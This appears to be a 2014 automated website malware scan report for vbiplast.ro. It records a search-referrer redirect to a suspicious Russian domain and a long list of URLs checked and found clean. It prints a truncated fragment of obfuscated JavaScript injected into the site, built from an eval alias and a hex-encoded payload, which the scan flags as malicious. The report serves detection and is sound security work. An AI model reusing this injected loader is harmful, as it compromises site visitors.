Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://vbiplast.ro/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: vbiplast.ro Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Found Connection: close Date: Fri, 29 Aug 2014 22:59:15 GMT Location: http://medicquil.ru Server: Apache Vary: Accept-Encoding Content-Length: 203 Content-Type: text/html; charset=iso-8859-1 | malicious |
Scanned pages/files
Request | Server response | Status |
http://vbiplast.ro/ | 200 OK Content-Length: 20780 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) phhlog="y";czsup="d"+"o"+"c"+"u"+"ment";try{+function(){if(document.querySelector)++(window[czsup].getElementById("asd"))==null}()}catch(spwy){ebfzh=function(bxmhbz){bxmhbz="fr"+"omCh"+bxmhbz;for(papwz=0;papwz<phhlog.length;papwz++){sjkmve+=String[bxmhbz](isp(csda+(phhlog[papwz]))-(41));}};};isp=(window.eval);csda="0x";thrqj=0;try{;}catch(qadpx){thrqj=1}if(!thrqj){try{++isp(czsup)["\x62o"+"d"+phhlog]}catch(spwy){ahccyg="^";}phhlog="49^8f^9e^97^8c^9d^92^98^97^49^8a^a3^59^62^51^52^49^a4^36^33^4 Antivirus reports:
| ||
http://kirmayerlaw.com/jacob/buy-canada-_viagra.php | 404 Not Found Content-Length: 2222 Content-Type: text/html | clean |
http://kirmayerlaw.com/test404page.js | 404 Not Found Content-Length: 2194 Content-Type: text/html | clean |
http://howhigh.xz.lt/pub/counter.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Fri, 29 Aug 2014 22:59:23 GMT Location: http://www.serveriai.lt/talpinimas.html Server: Apache Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html Status: 301 | clean |
http://www.serveriai.lt/talpinimas.html | 200 OK Content-Length: 9936 Content-Type: text/html | clean |
http://www.serveriai.lt/ | 200 OK Content-Length: 7661 Content-Type: text/html | clean |
http://www.serveriai.lt//www.iv.lt/jquery/js/jquery.js/ | HTTP/1.1 302 Found Connection: close Date: Fri, 29 Aug 2014 22:59:24 GMT Location: http://www.serveriai.lt/ Server: Apache Vary: Accept-Encoding Content-Length: 208 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.serveriai.lt//www.iv.lt/jquery/js/notice.jquery.js/ | HTTP/1.1 302 Found Connection: close Date: Fri, 29 Aug 2014 22:59:24 GMT Location: http://www.serveriai.lt/ Server: Apache Vary: Accept-Encoding Content-Length: 208 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.serveriai.lt//www.googleadservices.com/pagead/conversion.js/ | HTTP/1.1 302 Found Connection: close Date: Fri, 29 Aug 2014 22:59:24 GMT Location: http://www.serveriai.lt/ Server: Apache Vary: Accept-Encoding Content-Length: 208 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.serveriai.lt//www.iv.lt/statistika.php?type=last_order&service=svetain%EBs+talpinimas+ir+el.+pa%F0tas/ | HTTP/1.1 302 Found Connection: close Date: Fri, 29 Aug 2014 22:59:24 GMT Location: http://www.serveriai.lt/ Server: Apache Vary: Accept-Encoding Content-Length: 208 Content-Type: text/html; charset=iso-8859-1 | clean |
http://howhigh.xz.lt//www.iv.lt/dokumentai/talpinimas.pdf/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Fri, 29 Aug 2014 22:59:24 GMT Location: http://www.serveriai.lt/talpinimas.html Server: Apache Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html Status: 301 | clean |
http://howhigh.xz.lt/pub/srautas.html | HTTP/1.1 301 Moved Permanently Connection: close Date: Fri, 29 Aug 2014 22:59:24 GMT Location: http://www.serveriai.lt/talpinimas.html Server: Apache Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html Status: 301 | clean |
http://howhigh.xz.lt/pub/vieta.html | HTTP/1.1 301 Moved Permanently Connection: close Date: Fri, 29 Aug 2014 22:59:24 GMT Location: http://www.serveriai.lt/talpinimas.html Server: Apache Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html Status: 301 | clean |
http://howhigh.xz.lt/pub/pastas.html | HTTP/1.1 301 Moved Permanently Connection: close Date: Fri, 29 Aug 2014 22:59:24 GMT Location: http://www.serveriai.lt/talpinimas.html Server: Apache Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html Status: 301 | clean |
http://howhigh.xz.lt/pub/php.html | HTTP/1.1 301 Moved Permanently Connection: close Date: Fri, 29 Aug 2014 22:59:24 GMT Location: http://www.serveriai.lt/talpinimas.html Server: Apache Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html Status: 301 | clean |
http://howhigh.xz.lt/pub/mysql.html | HTTP/1.1 301 Moved Permanently Connection: close Date: Fri, 29 Aug 2014 22:59:24 GMT Location: http://www.serveriai.lt/talpinimas.html Server: Apache Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html Status: 301 | clean |
http://howhigh.xz.lt/pub/multi-domain.html | HTTP/1.1 301 Moved Permanently Connection: close Date: Fri, 29 Aug 2014 22:59:24 GMT Location: http://www.serveriai.lt/talpinimas.html Server: Apache Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html Status: 301 | clean |
http://howhigh.xz.lt/pub/programos.html | HTTP/1.1 301 Moved Permanently Connection: close Date: Fri, 29 Aug 2014 22:59:24 GMT Location: http://www.serveriai.lt/talpinimas.html Server: Apache Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html Status: 301 | clean |
http://howhigh.xz.lt/pub/apsauga.html | HTTP/1.1 301 Moved Permanently Connection: close Date: Fri, 29 Aug 2014 22:59:24 GMT Location: http://www.serveriai.lt/talpinimas.html Server: Apache Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html Status: 301 | clean |
http://howhigh.xz.lt/pub/ssl.html | HTTP/1.1 301 Moved Permanently Connection: close Date: Fri, 29 Aug 2014 22:59:24 GMT Location: http://www.serveriai.lt/talpinimas.html Server: Apache Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html Status: 301 | clean |
http://howhigh.xz.lt/pub/kopijos.html | HTTP/1.1 301 Moved Permanently Connection: close Date: Fri, 29 Aug 2014 22:59:24 GMT Location: http://www.serveriai.lt/talpinimas.html Server: Apache Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html Status: 301 | clean |
http://howhigh.xz.lt/pub/akcija.html | HTTP/1.1 301 Moved Permanently Connection: close Date: Fri, 29 Aug 2014 22:59:24 GMT Location: http://www.serveriai.lt/talpinimas.html Server: Apache Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html Status: 301 | clean |
http://howhigh.xz.lt/pub/garantija.html | HTTP/1.1 301 Moved Permanently Connection: close Date: Fri, 29 Aug 2014 22:59:25 GMT Location: http://www.serveriai.lt/talpinimas.html Server: Apache Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html Status: 301 | clean |
http://howhigh.xz.lt/pub/neribojami.html | HTTP/1.1 301 Moved Permanently Connection: close Date: Fri, 29 Aug 2014 22:59:25 GMT Location: http://www.serveriai.lt/talpinimas.html Server: Apache Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html Status: 301 | clean |
http://howhigh.xz.lt/pub/didmenininkams.html | HTTP/1.1 301 Moved Permanently Connection: close Date: Fri, 29 Aug 2014 22:59:25 GMT Location: http://www.serveriai.lt/talpinimas.html Server: Apache Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html Status: 301 | clean |
http://howhigh.xz.lt/pub/profesionalus.html | HTTP/1.1 301 Moved Permanently Connection: close Date: Fri, 29 Aug 2014 22:59:25 GMT Location: http://www.serveriai.lt/talpinimas.html Server: Apache Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html Status: 301 | clean |
http://howhigh.xz.lt/pub/demo/user.html | HTTP/1.1 301 Moved Permanently Connection: close Date: Fri, 29 Aug 2014 22:59:25 GMT Location: http://www.serveriai.lt/talpinimas.html Server: Apache Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html Status: 301 | clean |
http://howhigh.xz.lt/pub/talpinimas.html | HTTP/1.1 301 Moved Permanently Connection: close Date: Fri, 29 Aug 2014 22:59:25 GMT Location: http://www.serveriai.lt/talpinimas.html Server: Apache Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html Status: 301 | clean |
http://howhigh.xz.lt/pub/domenai.html | HTTP/1.1 301 Moved Permanently Connection: close Date: Fri, 29 Aug 2014 22:59:25 GMT Location: http://www.serveriai.lt/talpinimas.html Server: Apache Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html Status: 301 | clean |
http://howhigh.xz.lt/pub/klientams.html | HTTP/1.1 301 Moved Permanently Connection: close Date: Fri, 29 Aug 2014 22:59:25 GMT Location: http://www.serveriai.lt/talpinimas.html Server: Apache Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html Status: 301 | clean |
http://howhigh.xz.lt/pub/pirkti.php | HTTP/1.1 301 Moved Permanently Connection: close Date: Fri, 29 Aug 2014 22:59:25 GMT Location: http://www.serveriai.lt/talpinimas.html Server: Apache Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html Status: 301 | clean |
http://actchaya.com/test/is.js | 404 Not Found Content-Length: 469 Content-Type: text/html | clean |
http://www.reconstructing.me/is.js | 200 OK Content-Length: 1557 Content-Type: text/html | clean |
http://mondodesign.ro/sll/is.js | 404 Not Found Content-Length: 1148 Content-Type: text/html | clean |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=vbiplast.ro
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://vbiplast.ro/
Result: vbiplast.ro is not infected or malware details are not published yet.
Result: vbiplast.ro is not infected or malware details are not published yet.